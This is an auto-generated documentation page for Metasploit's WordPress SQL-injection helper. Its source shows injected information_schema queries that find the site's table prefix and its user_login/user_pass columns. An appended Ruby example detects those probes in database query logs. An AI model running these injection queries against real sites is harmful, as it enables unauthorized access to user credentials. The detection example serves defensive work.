<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The detected table prefix</p>
</div>
</li>
</ul>
<p class="tag_title">Raises:</p>
<ul class="raise">
<li>
<span class='type'>(<tt><span class='object_link'><a href="../../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">Failure::UnexpectedReply</a></span></tt>)</span>
&mdash;
<div class='inline'>
<p>If the table prefix could not be detected</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/wordpress/sqli.rb', line 85</span>
<span class='kw'>def</span> <span class='id identifier rubyid_wordpress_sqli_identify_table_prefix'>wordpress_sqli_identify_table_prefix</span>
<span class='id identifier rubyid_indicator'>indicator</span> <span class='op'>=</span> <span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>0</span><span class='op'>..</span><span class='int'>19</span><span class='rparen'>)</span>
<span class='id identifier rubyid_random_alias'>random_alias</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>1</span><span class='op'>..</span><span class='int'>5</span><span class='rparen'>)</span>
<span class='id identifier rubyid_default_prefix_check'>default_prefix_check</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>SELECT </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_indicator'>indicator</span><span class='embexpr_end'>}</span><span class='tstring_content'> FROM information_schema.tables WHERE table_name = &#39;wp_users&#39;</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_result'>result</span> <span class='op'>=</span> <span class='ivar'>@sqli</span><span class='period'>.</span><span class='id identifier rubyid_run_sql'>run_sql</span><span class='lparen'>(</span><span class='id identifier rubyid_default_prefix_check'>default_prefix_check</span><span class='rparen'>)</span><span class='op'>&amp;.</span><span class='id identifier rubyid_to_i'>to_i</span>
<span class='kw'>if</span> <span class='id identifier rubyid_result'>result</span> <span class='op'>==</span> <span class='id identifier rubyid_indicator'>indicator</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>{WPSQLi} Retrieved default table prefix: &#39;wp_&#39;</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>wp_</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>{WPSQLi} Default prefix not found, attempting to detect custom table prefix...</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_query'>query</span> <span class='op'>=</span> <span class='heredoc_beg'>&lt;&lt;-SQL</span>
<span class='tstring_content'> SELECT LEFT(table_name, LENGTH(table_name) - LENGTH(&#39;users&#39;))
FROM information_schema.tables
WHERE table_schema = database()
AND table_name LIKE &#39;%\\_users&#39;
AND (SELECT COUNT(*)
FROM information_schema.columns </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_random_alias'>random_alias</span><span class='embexpr_end'>}</span><span class='tstring_content'>
WHERE </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_random_alias'>random_alias</span><span class='embexpr_end'>}</span><span class='tstring_content'>.table_schema = tables.table_schema
AND </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_random_alias'>random_alias</span><span class='embexpr_end'>}</span><span class='tstring_content'>.table_name = tables.table_name
AND </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_random_alias'>random_alias</span><span class='embexpr_end'>}</span><span class='tstring_content'>.column_name IN (&#39;user_login&#39;, &#39;user_pass&#39;)
) = 2
LIMIT 1
</span><span class='heredoc_end'> SQL
</span>
<span class='id identifier rubyid_prefix'>prefix</span> <span class='op'>=</span> <span class='ivar'>@sqli</span><span class='period'>.</span><span class='id identifier rubyid_run_sql'>run_sql</span><span class='lparen'>(</span><span class='id identifier rubyid_query'>query</span><span class='period'>.</span><span class='id identifier rubyid_strip'>strip</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>\s+</span><span class='regexp_end'>/</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'> </span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_prefix'>prefix</span> <span class='op'>&amp;&amp;</span> <span class='op'>!</span><span class='id identifier rubyid_prefix'>prefix</span><span class='period'>.</span><span class='id identifier rubyid_strip'>strip</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>{WPSQLi} Unable to detect the table prefix.</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>{WPSQLi} Custom table prefix detected: &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_prefix'>prefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_prefix'>prefix</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
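<p>Added example, not part of the Metasploit source: detection logic for the two <tt>information_schema</tt> lookups above, run over database query-log lines. The tab-separated log layout, rule names and sample lines are assumptions constructed for illustration; adapt the field parsing to the log format in use.</p>

```ruby
# Added example (not Metasploit code). Rules key on the fragments both prefix
# queries above contain, so they also match when the fragment is embedded
# inside a larger statement issued by the web application.
RULES = {
  # information_schema.tables filtered on a table name ending in "users"
  users_table_probe: lambda { |sql|
    sql.include?('information_schema.tables') &&
      sql.match?(/table_name\s*(=|like)\s*'[^']*users'/)
  },
  # information_schema.columns checked for the WordPress credential columns
  credential_column_probe: lambda { |sql|
    sql.include?('information_schema.columns') &&
      sql.include?('user_login') && sql.include?('user_pass')
  }
}.freeze

# Strip inline comments, collapse whitespace and lowercase before matching.
def normalize(sql)
  sql.gsub(%r{/\*.*?\*/}m, ' ').gsub(/\s+/, ' ').strip.downcase
end

# Each line: timestamp <TAB> connection id <TAB> command <TAB> statement
def scan_query_log(lines)
  lines.filter_map do |line|
    time, conn, command, statement = line.chomp.split("\t", 4)
    next unless command == 'Query' && statement

    hits = RULES.select { |_name, rule| rule.call(normalize(statement)) }.keys
    { time: time, connection: conn.to_i, rules: hits } unless hits.empty?
  end
end

# Constructed sample log lines (simplified layout, not from a real server).
SAMPLE_LOG = [
  "2026-01-10T09:00:01Z\t41\tQuery\tSELECT option_value FROM wp_options WHERE option_name = 'siteurl' LIMIT 1",
  "2026-01-10T09:00:02Z\t42\tQuery\tSELECT 7 FROM information_schema.tables WHERE table_name = 'wp_users'",
  "2026-01-10T09:00:03Z\t42\tQuery\tSELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) " \
    "FROM information_schema.tables WHERE table_schema = database() AND table_name LIKE '%\\_users' " \
    "AND (SELECT COUNT(*) FROM information_schema.columns c " \
    "WHERE c.column_name IN ('user_login', 'user_pass')) = 2 LIMIT 1",
  "2026-01-10T09:00:04Z\t43\tConnect\twp@localhost on wordpress"
].freeze

scan_query_log(SAMPLE_LOG).each { |hit| puts hit.inspect }
```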
<div class="method_details ">
<h3 class="signature " id="wordpress_sqli_initialize-instance_method">
#<strong>wordpress_sqli_initialize</strong>(sqli) &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Function to initialize the SQLi instance in the mixin.</p>
<p>This function stores the SQLi instance created in the exploit module so that the mixin's helper methods can run SQL injection queries through it. It then detects the WordPress table prefix and keeps it for use in later queries.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>sqli</span>
<span class='type'>(<tt>Object</tt>)</span>
&mdash;
<div class='inline'>
<p>The SQLi instance initialized in the exploit module.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
21
22
23
24</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/wordpress/sqli.rb', line 21</span>
<span class='kw'>def</span> <span class='id identifier rubyid_wordpress_sqli_initialize'>wordpress_sqli_initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_sqli'>sqli</span><span class='rparen'>)</span>
<span class='ivar'>@sqli</span> <span class='op'>=</span> <span class='id identifier rubyid_sqli'>sqli</span>
<span class='ivar'>@prefix</span> <span class='op'>=</span> <span class='id identifier rubyid_wordpress_sqli_identify_table_prefix'>wordpress_sqli_identify_table_prefix</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:02:28 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>